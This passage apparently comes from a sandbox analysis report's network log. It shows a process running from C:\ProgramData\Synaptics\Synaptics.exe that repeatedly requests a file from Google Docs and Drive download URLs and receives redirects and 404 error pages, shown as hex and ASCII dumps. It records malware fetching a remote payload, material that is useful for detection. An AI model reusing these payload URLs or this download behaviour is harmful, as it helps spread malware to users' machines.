                                                                                                                                        2024-12-30 10:46:36 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 49 35 33 7a 45 39 76 78 4c 67 6d 39 79 6b 50 6d 43 72 78 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="II53zE9vxLgm9ykPmCrxZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:36 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        54192.168.2.549827142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:36 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=AjF33IdaeUNmHlmeyv_rklrZSnVFv8lgySmei1Dsqdy2rFxSjjfnAO-cl39aHo2JrrTKdNoIFV6ku8M9RkVKkd4wDR3j0NCN6DfoPbxsWlGAYN6sqEfJqKWWg0zy5MERV4xjBejEASTfCcn004MOi4zjgfmGet7SvpsNHYPAqhjQfvoi6GZ98aQ
                                                                                                                                        2024-12-30 10:46:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:36 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ME6CrGV8O-BFv_rlDQ0qMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        55192.168.2.549828142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:36 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=AjF33IdaeUNmHlmeyv_rklrZSnVFv8lgySmei1Dsqdy2rFxSjjfnAO-cl39aHo2JrrTKdNoIFV6ku8M9RkVKkd4wDR3j0NCN6DfoPbxsWlGAYN6sqEfJqKWWg0zy5MERV4xjBejEASTfCcn004MOi4zjgfmGet7SvpsNHYPAqhjQfvoi6GZ98aQ
                                                                                                                                        2024-12-30 10:46:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:36 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-iw4KhzvEQrQsTPZmqA8zQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        56192.168.2.549829142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:36 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:37 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC4SRYTN8JCguFe6pxvW1q4j_sxTbwuWY-PyogfFpjcEVAbfpPY12e1do2gxs8IGDcs39Kevjyk
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:36 GMT
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-LZr15ntIk5bahUJ8WV0OpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:37 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                        2024-12-30 10:46:37 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 62 5a 61 6d 6b 61 32 37 35 62 49 32 54 4f 59 64 6e 58 37 69 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="ObZamka275bI2TOYdnX7iw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:37 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        57192.168.2.549830142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:36 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:37 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC4Ue6LrGCymefIM-wbLv0yeXqHbDzzCCABWpzeN9oUSFgVTpklSoq1MqVzdWTl3MRxfGEoHal8
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:37 GMT
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-BTlHEkSFFbaUvAwNzkrKwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:37 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                        2024-12-30 10:46:37 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 5f 45 6b 65 56 43 4c 53 55 51 36 55 46 78 78 2d 44 5a 45 67 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="X_EkeVCLSUQ6UFxx-DZEgA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:37 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        58192.168.2.549838142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:37 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=AjF33IdaeUNmHlmeyv_rklrZSnVFv8lgySmei1Dsqdy2rFxSjjfnAO-cl39aHo2JrrTKdNoIFV6ku8M9RkVKkd4wDR3j0NCN6DfoPbxsWlGAYN6sqEfJqKWWg0zy5MERV4xjBejEASTfCcn004MOi4zjgfmGet7SvpsNHYPAqhjQfvoi6GZ98aQ
                                                                                                                                        2024-12-30 10:46:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:37 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-egeHxUFmJ1uMZKOnddUubQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        59192.168.2.549839142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:37 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:37 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0ajOwWhpVRqqj2Rc-tGrqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        60192.168.2.549840142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:37 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        61192.168.2.549841142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:37 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        62192.168.2.549847142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:38 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce--K-zLqGBFP9E3mnv3GhKYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
